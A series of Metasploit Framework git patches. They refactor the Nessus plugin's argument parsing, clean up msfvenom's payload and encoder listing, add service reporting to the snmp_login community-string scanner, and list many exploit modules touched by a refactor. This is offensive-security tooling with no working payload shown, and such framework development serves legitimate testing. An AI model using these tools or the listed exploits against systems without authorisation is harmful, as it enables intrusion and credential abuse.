args[1] - else + search_term = nil + search_vuln = nil + scan_id = nil + host_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_details ") + print_status("Example:> nessus_report_host_details 10 5 -S hostinfo -SV vulninfo") + print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") + print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + when '-SV', '--search-vuln' + search_vuln = /#{args.shift}/nmi + else + scan_id = arg, + host_id = args.shift + end + end + + if [scan_id, host_id].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_detail ") print_status("Example:> nessus_report_host_detail 10 5") @@ -636,6 +746,7 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin Name', 'Plugin Famil', @@ -654,6 +765,7 @@ module Msf } print_line tbl.to_s tbl2 = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_vuln, 'Columns' => [ 'Plugin Name', 'Plugin Famil', @@ -698,27 +810,33 @@ module Msf end def cmd_nessus_report_host_ports(*args) - if args[0] == "-h" - print_status("nessus_report_host_ports ") - print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() - print_status("Returns all the ports associated with a host and details about their vulnerabilities") - print_status("Use nessus_report_hosts to list all available hosts for a report") - end - if !nessus_verify_token - return - end - case args.length - when 2 - host = args[0] - rid = args[1] - else + search_term = nil + rid = nil + host = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_ports ") + print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca -S searchterm") + print_status() + print_status("Returns all the ports associated with a host and details about their vulnerabilities") + print_status("Use nessus_report_hosts to list all available hosts for a report") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end + end + + if [host,rid].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_ports ") print_status("Use nessus_report_list to list all available reports") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Port', 'Protocol', @@ -775,13 +893,20 @@ module Msf end def cmd_nessus_scan_list(*args) - if args[0] == "-h" - print_status("nessus_scan_list") - print_status("Example:> nessus_scan_list") - print_status() - print_status("Returns a list of information about currently running scans.") - return - end + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scan_list") + print_status("Example:> nessus_scan_list -S searchterm") + print_status() + print_status("Returns a list of information about currently running scans.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end + if !nessus_verify_token return end @@ -791,6 +916,7 @@ module Msf return else tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Scan ID', 'Name', @@ -1014,18 +1140,6 @@ module Msf else print_error("Only completed scans could be used for import") end - - end - - def is_scan_complete(scan_id) - complete = false - status = @n.scan_list - status["scans"].each { |scan| - if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") - complete = true - end - } - complete end def cmd_nessus_scan_pause_all(*args) @@ -1174,35 +1288,39 @@ module Msf end def cmd_nessus_scan_details(*args) - if args[0] == "-h" - print_status("nessus_scan_details ") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return - end + valid_categories = ['info', 'hosts', 'vulnerabilities', 'history'] + search_term = nil + scan_id = nil + category = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("Usage: ") + print_status("nessus_scan_details -S searchterm") + print_status("Availble categories are info, hosts, vulnerabilities, and history") + print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + if args[0].in?(valid_categories) + category = args.shift + else + print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") + return + end + end + end + if !nessus_verify_token return end - case args.length - when 2 - scan_id = args[0] - category = args[1] - if category.in?(['info', 'hosts', 'vulnerabilities', 'history']) - category = args[1] - else - print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") - return - end - else - print_status("Usage: ") - print_status("nessus_scan_details ") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return - end + details = @n.scan_details(scan_id) if category == "info" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Status", "Policy", @@ -1214,6 +1332,7 @@ module Msf tbl << [ details["info"]["status"], details["info"]["policy"], details["info"]["name"], details["info"]["targets"], details["info"]["scan_start"], details["info"]["scan_end"] ] elsif category == "hosts" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", @@ -1227,6 +1346,7 @@ module Msf } elsif category == "vulnerabilities" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", @@ -1238,6 +1358,7 @@ module Msf } elsif category == "history" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "History ID", "Status", @@ -1319,27 +1440,32 @@ module Msf end def cmd_nessus_plugin_list(*args) - if args[0] == "-h" - print_status("nessus_plugin_list ") - print_status("Example:> nessus_plugin_list 10") - print_status() - print_status("Returns a list of all plugins in that family.") - print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") - return - end - if !nessus_verify_token - return - end - case args.length - when 1 - family_id = args[0] - else + search_term = nil + family_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_list -S searchterm") + print_status("Example:> nessus_plugin_list 10") + print_status() + print_status("Returns a list of all plugins in that family.") + print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + family_id = arg + end + end + + if family_id.nil? print_status("Usage: ") print_status("nessus_plugin_list ") print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin ID', 'Plugin Name' @@ -1355,15 +1481,23 @@ module Msf end def cmd_nessus_family_list(*args) - if args[0] == "-h" - print_status("nessus_family_list") - print_status("Example:> nessus_family_list") - print_status() - print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") - return - end + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_family_list") + print_status("Example:> nessus_family_list -S searchterm") + print_status() + print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end + list = @n.list_families tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Family ID', 'Family Name', @@ -1377,27 +1511,36 @@ module Msf end def cmd_nessus_plugin_details(*args) - if args[0] == "-h" - print_status("nessus_plugin_details ") - print_status("Example:> nessus_plugin_details 10264") - print_status() - print_status("Returns details on a particular plugin.") - print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") - return - end + search_term = nil + plugin_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_details ") + print_status("Example:> nessus_plugin_details 10264 -S searchterm") + print_status() + print_status("Returns details on a particular plugin.") + print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + plugin_id = arg + end + end + if !nessus_verify_token return end - case args.length - when 1 - plugin_id = args[0] - else + + if plugin_id.nil? print_status("Usage: ") print_status("nessus_plugin_details ") print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Reference', 'Value' @@ -1423,13 +1566,20 @@ module Msf end def cmd_nessus_user_list(*args) - if args[0] == "-h" - print_status("nessus_user_list") - print_status("Example:> nessus_user_list") - print_status() - print_status("Returns a list of the users on the Nessus server and their access level.") - return - end + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_user_list") + print_status("Example:> nessus_user_list -S searchterm") + print_status() + print_status("Returns a list of the users on the Nessus server and their access level.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end + if !nessus_verify_token return end @@ -1438,6 +1588,7 @@ module Msf end list=@n.list_users tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'ID', 'Name', @@ -1574,13 +1725,20 @@ module Msf end def cmd_nessus_policy_list(*args) - if args[0] == "-h" - print_status("nessus_policy_list") - print_status("Example:> nessus_policy_list") - print_status() - print_status("Lists all policies on the server") - return - end + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_policy_list") + print_status("Example:> nessus_policy_list -S searchterm") + print_status() + print_status("Lists all policies on the server") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end + if !nessus_verify_token return end @@ -1642,31 +1800,6 @@ module Msf print_error("Unknown problem occured by deleting the user account having user ID #{user_id}.") end end - - def valid_policy(*args) - case args.length - when 1 - pid = args[0] - else - print_error("No Policy ID supplied.") - return - end - pol = @n.list_policies - pol["policies"].each { |p| - if p["template_uuid"] == pid - return true - end - } - return false - end - - def nessus_verify_db - if !(framework.db and framework.db.active) - print_error("No database has been configured, please use db_create/db_connect first") - return false - end - true - end end def initialize(framework, opts) From 2a71d32eec7437425e80c2ccf938aa596833cbbb Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Mon, 1 Feb 2016 01:49:58 -0500 Subject: [PATCH 251/686] Fix cmd_nessus_server_properties help text cmd_nessus_server_properties help text was incorrect and referred to nessus_server_feed. Fix the help text to correctly reflect command name. Thanks @void-in --- plugins/nessus.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 93490df90e..5d6280ca5e 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -427,8 +427,8 @@ module Msf while (arg = args.shift) case arg when '-h', '--help' - print_status("nessus_server_feed") - print_status("Example:> nessus_server_feed -S searchterm") + print_status("nessus_server_properties") + print_status("Example:> nessus_server_properties -S searchterm") print_status() print_status("Returns information about the feed type and server version.") return From 5d14958d0cbccadd2f69ea3ada5e81d3d76753b7 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 1 Feb 2016 09:06:08 -0600 Subject: [PATCH 252/686] Fix typo and instead just do the right thing quesetion is not question --- msfvenom | 15 ++++----------- 1 file changed, 4 insertions(+), 11 deletions(-) diff --git a/msfvenom b/msfvenom index 045cb07e78..04f3b8d56c 100755 --- a/msfvenom +++ b/msfvenom @@ -290,11 +290,11 @@ if __FILE__ == $0 if generator_opts[:list] generator_opts[:list].each do |mod| case mod.downcase - when "payloads" + when "payloads", "payload" $stdout.puts dump_payloads - when "encoders" + when "encoders", "encoder" $stdout.puts dump_encoders(generator_opts[:arch]) - when "nops" + when "nops", "nop" $stdout.puts dump_nops when "all" # Init here so #dump_payloads doesn't create a framework with @@ -304,14 +304,7 @@ if __FILE__ == $0 $stdout.puts dump_encoders $stdout.puts dump_nops else - if mod == 'payload' - question = ". Do you mean 'payloads'?" - elsif mod == 'encoder' - question = ". Do you mean 'encoders'?" - elsif mod == 'nop' - quesetion = ". Do you mean 'nops'?" - end - $stderr.puts "Invalid module type#{question}" + $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" end end exit(0) From 9121579129ab4f6faab642bb4fee5508ab31429a Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 1 Feb 2016 09:25:34 -0600 Subject: [PATCH 253/686] Some whitespace fixes for rubocop --- msfvenom | 78 ++++++++++++++++++++++++++++---------------------------- 1 file changed, 39 insertions(+), 39 deletions(-) diff --git a/msfvenom b/msfvenom index 04f3b8d56c..e58e099b37 100755 --- a/msfvenom +++ b/msfvenom @@ -54,7 +54,7 @@ require 'msf/core/payload_generator' opts = {} datastore = {} opt = OptionParser.new - banner = "MsfVenom - a Metasploit standalone payload generator.\n" + banner = "MsfVenom - a Metasploit standalone payload generator.\n" banner << "Also a replacement for msfpayload and msfencode.\n" banner << "Usage: #{$0} [options] " opt.banner = banner @@ -220,13 +220,13 @@ require 'msf/core/payload_generator' def dump_payloads init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", - 'Columns' => - [ - "Name", - "Description" - ]) + 'Indent' => 4, + 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", + 'Columns' => + [ + "Name", + "Description" + ]) framework.payloads.each_module { |name, mod| tbl << [ name, mod.new.description.split.join(' ') ] @@ -238,14 +238,14 @@ require 'msf/core/payload_generator' def dump_encoders(arch = nil) init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), - 'Columns' => - [ - "Name", - "Rank", - "Description" - ]) + 'Indent' => 4, + 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), + 'Columns' => + [ + "Name", + "Rank", + "Description" + ]) cnt = 0 framework.encoders.each_module( @@ -261,13 +261,13 @@ require 'msf/core/payload_generator' def dump_nops init_framework(:module_types => [ ::Msf::MODULE_NOP ]) tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", - 'Columns' => - [ - "Name", - "Description" - ]) + 'Indent' => 4, + 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", + 'Columns' => + [ + "Name", + "Description" + ]) framework.nops.each_module { |name, mod| tbl << [ name, mod.new.description.split.join(' ') ] @@ -290,21 +290,21 @@ if __FILE__ == $0 if generator_opts[:list] generator_opts[:list].each do |mod| case mod.downcase - when "payloads", "payload" - $stdout.puts dump_payloads - when "encoders", "encoder" - $stdout.puts dump_encoders(generator_opts[:arch]) - when "nops", "nop" - $stdout.puts dump_nops - when "all" - # Init here so #dump_payloads doesn't create a framework with - # only payloads, etc. - init_framework - $stdout.puts dump_payloads - $stdout.puts dump_encoders - $stdout.puts dump_nops - else - $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" + when "payloads", "payload" + $stdout.puts dump_payloads + when "encoders", "encoder" + $stdout.puts dump_encoders(generator_opts[:arch]) + when "nops", "nop" + $stdout.puts dump_nops + when "all" + # Init here so #dump_payloads doesn't create a framework with + # only payloads, etc. + init_framework + $stdout.puts dump_payloads + $stdout.puts dump_encoders + $stdout.puts dump_nops + else + $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" end end exit(0) @@ -333,7 +333,7 @@ if __FILE__ == $0 generator_opts[:cli] = true begin - venom_generator = Msf::PayloadGenerator.new(generator_opts) + venom_generator = Msf::PayloadGenerator.new(generator_opts) payload = venom_generator.generate_payload rescue ::Exception => e elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") From f8d04996a221be5dd0b47e3eef13758e1596c8ec Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 1 Feb 2016 09:26:32 -0600 Subject: [PATCH 254/686] No need to do anything at all if we're included --- msfvenom | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/msfvenom b/msfvenom index e58e099b37..22ef73d5e5 100755 --- a/msfvenom +++ b/msfvenom @@ -1,20 +1,22 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -msfbase = __FILE__ -while File.symlink?(msfbase) - msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) -end +if __FILE__ == $0 -$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) -require 'msfenv' + msfbase = __FILE__ + while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) + end -$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] + $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) + require 'msfenv' -require 'rex' -require 'msf/ui' -require 'msf/base' -require 'msf/core/payload_generator' + $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] + + require 'rex' + require 'msf/ui' + require 'msf/base' + require 'msf/core/payload_generator' class MsfVenomError < StandardError; end @@ -278,8 +280,6 @@ require 'msf/core/payload_generator' -if __FILE__ == $0 - begin generator_opts = parse_args(ARGV) rescue MsfVenomError, Msf::OptionValidateError => e From f5ee6ce2f3e7bf3c8b9149af0beff09c228380a8 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 1 Feb 2016 12:24:19 -0600 Subject: [PATCH 255/686] Better service reporting for snmp_login Report the snmp string and update the module title & description to better clarify what the module really does. --- modules/auxiliary/scanner/snmp/snmp_login.rb | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index 980c437f15..a12761684b 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -16,8 +16,10 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'SNMP Community Scanner', - 'Description' => 'Scan for SNMP devices using common community names', + 'Name' => 'SNMP Community Login Scanner', + 'Description' => %q{ + This module logs in to SNMP devices using common community names. + }, 'Author' => 'hdm', 'References' => [ @@ -71,6 +73,14 @@ class Metasploit3 < Msf::Auxiliary create_credential_login(credential_data) print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential} (Access level: #{result.access_level}); Proof (sysDescr.0): #{result.proof}" + report_service( + :host => ip, + :port => rport, + :proto => 'udp', + :name => 'snmp', + :info => result.proof, + :state => 'open' + ) else invalidate_login(credential_data) print_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})" From 12256a642342c31d5a7d1a25fbe499ec708700bd Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 1 Feb 2016 15:12:03 -0600 Subject: [PATCH 256/686] Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient --- .../freebsd/misc/citrix_netscaler_soap_bof.rb | 2 +- .../linux/antivirus/escan_password_exec.rb | 6 +-- .../http/advantech_switch_bash_env_exec.rb | 10 ++-- .../linux/http/airties_login_cgi_bof.rb | 4 +- .../linux/http/alienvault_sqli_exec.rb | 40 +++++++-------- .../exploits/linux/http/astium_sqli_upload.rb | 20 ++++---- .../exploits/linux/http/belkin_login_bof.rb | 4 +- .../exploits/linux/http/centreon_sqli_exec.rb | 2 +- .../http/dlink_authentication_cgi_bof.rb | 4 +- .../linux/http/dlink_dcs931l_upload.rb | 18 +++---- .../linux/http/dlink_dir605l_captcha_bof.rb | 2 +- .../http/dlink_dspw110_cookie_noauth_exec.rb | 6 +-- .../linux/http/dlink_dspw215_info_cgi_bof.rb | 4 +- .../linux/http/dlink_hedwig_cgi_bof.rb | 4 +- modules/exploits/linux/http/dlink_hnap_bof.rb | 4 +- .../http/dlink_hnap_header_exec_noauth.rb | 4 +- .../linux/http/dlink_upnp_exec_noauth.rb | 4 +- .../exploits/linux/http/dolibarr_cmd_exec.rb | 12 ++--- modules/exploits/linux/http/esva_exec.rb | 8 +-- .../exploits/linux/http/fritzbox_echo_exec.rb | 4 +- .../linux/http/groundwork_monarch_cmd_exec.rb | 6 +-- modules/exploits/linux/http/kloxo_sqli.rb | 16 +++--- .../linux/http/linksys_themoon_exec.rb | 4 +- .../linux/http/multi_ncc_ping_exec.rb | 10 ++-- .../linux/http/mutiny_frontend_upload.rb | 10 ++-- .../linux/http/netgear_readynas_exec.rb | 2 +- .../exploits/linux/http/nginx_chunked_size.rb | 14 +++--- .../linux/http/openfiler_networkcard_exec.rb | 8 +-- .../exploits/linux/http/pandora_fms_exec.rb | 8 +-- .../exploits/linux/http/pandora_fms_sqli.rb | 48 +++++++++--------- .../http/realtek_miniigd_upnp_exec_noauth.rb | 4 +- .../linux/http/seagate_nas_php_exec_noauth.rb | 34 ++++++------- .../linux/http/smt_ipmi_close_window_bof.rb | 2 +- .../linux/http/symantec_web_gateway_exec.rb | 4 +- .../http/symantec_web_gateway_file_upload.rb | 8 +-- .../linux/http/symantec_web_gateway_lfi.rb | 6 +-- .../synology_dsm_sliceupload_exec_noauth.rb | 12 ++--- .../linux/http/vap2500_tools_command_exec.rb | 8 +-- modules/exploits/linux/http/wanem_exec.rb | 12 ++--- .../linux/http/webcalendar_settings_exec.rb | 4 +- .../exploits/linux/http/webid_converter.rb | 14 +++--- modules/exploits/linux/http/zabbix_sqli.rb | 18 +++---- .../linux/http/zen_load_balancer_exec.rb | 6 +-- .../http/zenoss_showdaemonxmlconfig_exec.rb | 12 ++--- .../exploits/linux/misc/zabbix_server_exec.rb | 16 +++--- .../linux/smtp/exim_gethostbyname_bof.rb | 2 +- .../multi/elasticsearch/script_mvel_rce.rb | 18 +++---- .../elasticsearch/search_groovy_script.rb | 20 ++++---- .../http/ajaxplorer_checkinstall_exec.rb | 6 +-- .../multi/http/apprain_upload_exec.rb | 8 +-- .../multi/http/auxilium_upload_exec.rb | 8 +-- .../exploits/multi/http/bolt_file_upload.rb | 18 +++---- .../multi/http/caidao_php_backdoor_exec.rb | 2 +- .../exploits/multi/http/cisco_dcnm_upload.rb | 4 +- modules/exploits/multi/http/coldfusion_rds.rb | 24 ++++----- .../exploits/multi/http/cups_bash_env_exec.rb | 30 +++++------ .../multi/http/cuteflow_upload_exec.rb | 6 +-- .../multi/http/dexter_casinoloader_exec.rb | 18 +++---- .../exploits/multi/http/drupal_drupageddon.rb | 26 +++++----- .../multi/http/eventlog_file_upload.rb | 14 +++--- .../multi/http/extplorer_upload_exec.rb | 26 +++++----- .../multi/http/glossword_upload_exec.rb | 22 ++++---- .../multi/http/hp_sitescope_issuesiebelcmd.rb | 4 +- .../http/hp_sitescope_uploadfileshandler.rb | 28 +++++------ .../exploits/multi/http/hp_sys_mgmt_exec.rb | 6 +-- .../multi/http/hyperic_hq_script_console.rb | 32 ++++++------ .../multi/http/kordil_edms_upload_exec.rb | 8 +-- .../multi/http/log1cms_ajax_create_folder.rb | 4 +- .../multi/http/manage_engine_dc_pmp_sqli.rb | 26 +++++----- .../multi/http/manageengine_auth_upload.rb | 12 ++--- .../multi/http/manageengine_sd_uploader.rb | 4 +- .../multi/http/mma_backdoor_upload.rb | 4 +- .../multi/http/mobilecartly_upload_exec.rb | 6 +-- .../multi/http/movabletype_upgrade_exec.rb | 4 +- .../multi/http/mutiny_subnetmask_exec.rb | 36 ++++++------- .../multi/http/nibbleblog_file_upload.rb | 16 +++--- .../http/opmanager_socialit_file_upload.rb | 12 ++--- .../exploits/multi/http/oracle_reports_rce.rb | 50 +++++++++---------- .../multi/http/pandora_upload_exec.rb | 8 +-- .../multi/http/php_volunteer_upload_exec.rb | 22 ++++---- .../exploits/multi/http/phpfilemanager_rce.rb | 4 +- .../multi/http/phpwiki_ploticus_exec.rb | 2 +- .../multi/http/polarcms_upload_exec.rb | 4 +- .../exploits/multi/http/processmaker_exec.rb | 20 ++++---- .../exploits/multi/http/qdpm_upload_exec.rb | 24 ++++----- .../rocket_servergraph_file_requestor_rce.rb | 22 ++++---- .../exploits/multi/http/sflog_upload_exec.rb | 12 ++--- .../solarwinds_store_manager_auth_filter.rb | 18 +++---- .../multi/http/sonicwall_gms_upload.rb | 10 ++-- .../http/struts_code_exec_classloader.rb | 16 +++--- .../multi/http/struts_code_exec_parameters.rb | 4 +- .../multi/http/sysaid_auth_file_upload.rb | 12 ++--- .../multi/http/sysaid_rdslogs_file_upload.rb | 12 ++--- .../multi/http/testlink_upload_exec.rb | 50 +++++++++---------- .../exploits/multi/http/tomcat_mgr_upload.rb | 34 ++++++------- .../multi/http/uptime_file_upload_1.rb | 6 +-- .../multi/http/vbulletin_unserialize.rb | 4 +- .../http/visual_mining_netcharts_upload.rb | 6 +-- .../exploits/multi/http/vtiger_soap_upload.rb | 6 +-- .../multi/http/webpagetest_upload_exec.rb | 8 +-- .../exploits/multi/http/wikka_spam_exec.rb | 6 +-- ...enworks_configuration_management_upload.rb | 8 +-- .../misc/hp_data_protector_exec_integutil.rb | 18 +++---- .../exploits/multi/misc/java_jdwp_debugger.rb | 38 +++++++------- .../exploits/multi/misc/java_jmx_server.rb | 46 ++++++++--------- .../exploits/multi/misc/java_rmi_server.rb | 4 +- .../exploits/unix/ftp/proftpd_modcopy_exec.rb | 2 +- .../unix/http/vmturbo_vmtadmin_exec_noauth.rb | 10 ++-- .../webapp/actualanalyzer_ant_cookie_exec.rb | 38 +++++++------- .../unix/webapp/arkeia_upload_exec.rb | 12 ++--- .../unix/webapp/clipbucket_upload_exec.rb | 10 ++-- .../unix/webapp/datalife_preview_exec.rb | 2 +- .../unix/webapp/egallery_upload_exec.rb | 8 +-- .../unix/webapp/flashchat_upload_exec.rb | 8 +-- .../unix/webapp/freepbx_config_exec.rb | 8 +-- .../unix/webapp/get_simple_cms_upload_exec.rb | 14 +++--- .../exploits/unix/webapp/hastymail_exec.rb | 12 ++--- .../unix/webapp/havalite_upload_exec.rb | 8 +-- .../unix/webapp/horde_unserialize_exec.rb | 4 +- .../webapp/hybridauth_install_php_exec.rb | 28 +++++------ .../invision_pboard_unserialize_exec.rb | 18 +++---- .../unix/webapp/joomla_akeeba_unserialize.rb | 6 +-- .../webapp/joomla_contenthistory_sqli_rce.rb | 22 ++++---- .../unix/webapp/joomla_media_upload_exec.rb | 18 +++---- modules/exploits/unix/webapp/kimai_sqli.rb | 38 +++++++------- .../unix/webapp/libretto_upload_exec.rb | 8 +-- .../webapp/maarch_letterbox_file_upload.rb | 10 ++-- .../unix/webapp/narcissus_backend_exec.rb | 8 +-- .../webapp/open_flash_chart_upload_exec.rb | 12 ++--- .../webapp/openemr_sqli_privesc_upload.rb | 16 +++--- .../unix/webapp/openemr_upload_exec.rb | 12 ++--- .../unix/webapp/opensis_modname_exec.rb | 12 ++--- .../exploits/unix/webapp/php_charts_exec.rb | 8 +-- .../unix/webapp/projectpier_upload_exec.rb | 8 +-- .../unix/webapp/projectsend_upload_exec.rb | 30 +++++------ .../unix/webapp/seportal_sqli_exec.rb | 20 ++++---- .../webapp/simple_e_document_upload_exec.rb | 14 +++--- .../sixapart_movabletype_storable_exec.rb | 16 +++--- .../unix/webapp/skybluecanvas_exec.rb | 4 +- .../unix/webapp/sugarcrm_unserialize_exec.rb | 12 ++--- .../unix/webapp/tikiwiki_unserialize_exec.rb | 18 +++---- .../unix/webapp/tuleap_unserialize_exec.rb | 6 +-- .../unix/webapp/vbulletin_vote_sqli_exec.rb | 46 ++++++++--------- .../webapp/vicidial_manager_send_cmd_exec.rb | 10 ++-- .../unix/webapp/webmin_show_cgi_exec.rb | 24 ++++----- .../exploits/unix/webapp/webtester_exec.rb | 10 ++-- .../unix/webapp/wp_admin_shell_upload.rb | 10 ++-- .../webapp/wp_ajax_load_more_file_upload.rb | 10 ++-- .../webapp/wp_asset_manager_upload_exec.rb | 4 +- .../wp_creativecontactform_file_upload.rb | 4 +- .../unix/webapp/wp_downloadmanager_upload.rb | 6 +-- .../wp_easycart_unrestricted_file_upload.rb | 24 ++++----- .../unix/webapp/wp_foxypress_upload.rb | 8 +-- .../webapp/wp_frontend_editor_file_upload.rb | 6 +-- .../webapp/wp_holding_pattern_file_upload.rb | 6 +-- .../wp_inboundio_marketing_file_upload.rb | 4 +- .../unix/webapp/wp_infusionsoft_upload.rb | 4 +- .../webapp/wp_nmediawebsite_file_upload.rb | 4 +- .../unix/webapp/wp_optimizepress_upload.rb | 8 +-- ..._photo_gallery_unrestricted_file_upload.rb | 18 +++---- .../unix/webapp/wp_pixabay_images_upload.rb | 10 ++-- .../exploits/unix/webapp/wp_platform_exec.rb | 2 +- .../unix/webapp/wp_property_upload_exec.rb | 4 +- .../webapp/wp_reflexgallery_file_upload.rb | 4 +- .../webapp/wp_revslider_upload_execute.rb | 4 +- .../unix/webapp/wp_slideshowgallery_upload.rb | 10 ++-- .../unix/webapp/wp_symposium_shell_upload.rb | 14 +++--- .../unix/webapp/wp_total_cache_exec.rb | 22 ++++---- .../unix/webapp/wp_worktheflow_upload.rb | 4 +- .../webapp/wp_wpshop_ecommerce_file_upload.rb | 4 +- .../unix/webapp/wp_wptouch_file_upload.rb | 20 ++++---- .../webapp/wp_wysija_newsletters_upload.rb | 6 +-- .../exploits/unix/webapp/xoda_file_upload.rb | 8 +-- .../exploits/unix/webapp/zeroshell_exec.rb | 10 ++-- modules/exploits/unix/webapp/zimbra_lfi.rb | 14 +++--- .../webapp/zoneminder_packagecontrol_exec.rb | 14 +++--- .../unix/webapp/zpanel_username_exec.rb | 10 ++-- .../symantec_endpoint_manager_rce.rb | 2 +- .../symantec_workspace_streaming_exec.rb | 6 +-- .../exploits/windows/ftp/freefloatftp_wbem.rb | 18 +++---- .../exploits/windows/ftp/open_ftpd_wbem.rb | 12 ++--- .../windows/ftp/quickshare_traversal_write.rb | 14 +++--- .../windows/ftp/wing_ftp_admin_exec.rb | 4 +- .../http/avaya_ccr_imageupload_exec.rb | 20 ++++---- .../windows/http/cogent_datahub_command.rb | 8 +-- .../exploits/windows/http/cyclope_ess_sqli.rb | 12 ++--- .../http/desktopcentral_file_upload.rb | 10 ++-- .../desktopcentral_statusupdate_upload.rb | 10 